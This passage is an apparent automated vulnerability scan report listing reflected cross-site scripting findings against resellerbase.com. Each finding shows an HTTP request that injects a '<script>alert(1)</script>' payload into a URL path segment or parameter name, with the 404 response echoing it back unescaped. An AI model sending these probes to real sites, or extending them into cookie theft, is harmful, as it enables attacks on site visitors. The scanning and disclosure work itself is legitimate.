This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/38/search.php?keyword=search...&Submit3=Search&opt=283fca<a>c770127ee66 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/whitelabelcash-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/search.php?keyword=search...&Submit3=Search&opt=283fca<a>c770127ee66 was not found on this server.</p>
...[SNIP]...

2.2567. http://www.resellerbase.com/detail/38/themes/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6fb9f<script>alert(1)</script>4d006f02854 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail6fb9f<script>alert(1)</script>4d006f02854/38/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail6fb9f<script>alert(1)</script>4d006f02854/38/themes/ was not found on this server.</p>
...[SNIP]...

2.2568. http://www.resellerbase.com/detail/38/themes/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2540d<script>alert(1)</script>6486cfd5712 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/382540d<script>alert(1)</script>6486cfd5712/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/382540d<script>alert(1)</script>6486cfd5712/themes/ was not found on this server.</p>
...[SNIP]...

2.2569. http://www.resellerbase.com/detail/38/themes/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e932f<script>alert(1)</script>87122a2f39 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themese932f<script>alert(1)</script>87122a2f39/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themese932f<script>alert(1)</script>87122a2f39/ was not found on this server.</p>
...[SNIP]...

2.2570. http://www.resellerbase.com/detail/38/themes/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1ffb7<script>alert(1)</script>2785ffce704 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes/?1ffb7<script>alert(1)</script>2785ffce704=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/?1ffb7<script>alert(1)</script>2785ffce704=1 was not found on this server.</p>
...[SNIP]...

2.2571. http://www.resellerbase.com/detail/38/themes/kosmos/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9dbae<script>alert(1)</script>a838fefbc46 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail9dbae<script>alert(1)</script>a838fefbc46/38/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail9dbae<script>alert(1)</script>a838fefbc46/38/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.2572. http://www.resellerbase.com/detail/38/themes/kosmos/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e0aca<script>alert(1)</script>454f7bd597e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38e0aca<script>alert(1)</script>454f7bd597e/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38e0aca<script>alert(1)</script>454f7bd597e/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.2573. http://www.resellerbase.com/detail/38/themes/kosmos/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e60fe<script>alert(1)</script>5e224d7fb1e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themese60fe<script>alert(1)</script>5e224d7fb1e/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themese60fe<script>alert(1)</script>5e224d7fb1e/kosmos/ was not found on this server.</p>
...[SNIP]...

2.2574. http://www.resellerbase.com/detail/38/themes/kosmos/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4e762<script>alert(1)</script>44122a4b1e5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes/kosmos4e762<script>alert(1)</script>44122a4b1e5/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos4e762<script>alert(1)</script>44122a4b1e5/ was not found on this server.</p>
...[SNIP]...

2.2575. http://www.resellerbase.com/detail/38/themes/kosmos/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3ea0c<script>alert(1)</script>da23178c3b1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes/kosmos/?3ea0c<script>alert(1)</script>da23178c3b1=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos/?3ea0c<script>alert(1)</script>da23178c3b1=1 was not found on this server.</p>
...[SNIP]...

2.2576. http://www.resellerbase.com/detail/38/themes/kosmos/images/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 31a29<script>alert(1)</script>2c68ba960a0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail31a29<script>alert(1)</script>2c68ba960a0/38/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail31a29<script>alert(1)</script>2c68ba960a0/38/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.2577. http://www.resellerbase.com/detail/38/themes/kosmos/images/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a94b8<script>alert(1)</script>cfc0d865df1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38a94b8<script>alert(1)</script>cfc0d865df1/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38a94b8<script>alert(1)</script>cfc0d865df1/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.2578. http://www.resellerbase.com/detail/38/themes/kosmos/images/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1dfba<script>alert(1)</script>5582ba47c3d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes1dfba<script>alert(1)</script>5582ba47c3d/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes1dfba<script>alert(1)</script>5582ba47c3d/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.2579. http://www.resellerbase.com/detail/38/themes/kosmos/images/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b2c3c<script>alert(1)</script>8d0a468788d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes/kosmosb2c3c<script>alert(1)</script>8d0a468788d/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmosb2c3c<script>alert(1)</script>8d0a468788d/images/ was not found on this server.</p>
...[SNIP]...

2.2580. http://www.resellerbase.com/detail/38/themes/kosmos/images/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 88244<script>alert(1)</script>4b7f5e68edc was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes/kosmos/images88244<script>alert(1)</script>4b7f5e68edc/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos/images88244<script>alert(1)</script>4b7f5e68edc/ was not found on this server.</p>
...[SNIP]...

2.2581. http://www.resellerbase.com/detail/38/themes/kosmos/images/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 59d55<script>alert(1)</script>5a11c5ef10 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes/kosmos/images/?59d55<script>alert(1)</script>5a11c5ef10=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

2.2582. http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2b26c<script>alert(1)</script>20ea91f80fc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail2b26c<script>alert(1)</script>20ea91f80fc/38/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail2b26c<script>alert(1)</script>20ea91f80fc/38/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2583. http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 26626<script>alert(1)</script>95fddebccd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/3826626<script>alert(1)</script>95fddebccd/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/3826626<script>alert(1)</script>95fddebccd/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2584. http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 657d0<script>alert(1)</script>7d79a398a41 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes657d0<script>alert(1)</script>7d79a398a41/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes657d0<script>alert(1)</script>7d79a398a41/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2585. http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c1594<script>alert(1)</script>a968496bc4e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes/kosmosc1594<script>alert(1)</script>a968496bc4e/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmosc1594<script>alert(1)</script>a968496bc4e/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2586. http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 1c22e<script>alert(1)</script>6f82651162 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes/kosmos/images1c22e<script>alert(1)</script>6f82651162/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
